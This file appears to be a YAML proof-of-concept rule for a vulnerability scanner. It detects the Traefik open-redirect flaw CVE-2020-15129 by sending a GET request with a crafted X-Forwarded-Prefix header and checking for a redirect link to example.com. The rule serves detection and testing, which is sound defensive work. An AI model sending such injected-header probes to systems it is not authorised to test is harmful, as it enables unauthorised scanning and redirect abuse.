name: poc-yaml-traefik-cve-2020-15129-redirect
binding: 30bb9431-0992-416b-9d1b-ee9e0176a842
manual: true
detail:
    author: å°z
    links:
        - https://nvd.nist.gov/vuln/detail/CVE-2020-15129
    vulnerability:
        level: medium
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /
            headers:
                X-Forwarded-Prefix: https://example.com
            follow_redirects: false
        expression: response.status >= 300 && response.status < 400 && response.body_string.contains('<a href="https://example.com/dashboard/">Found</a>')
expression: r0()
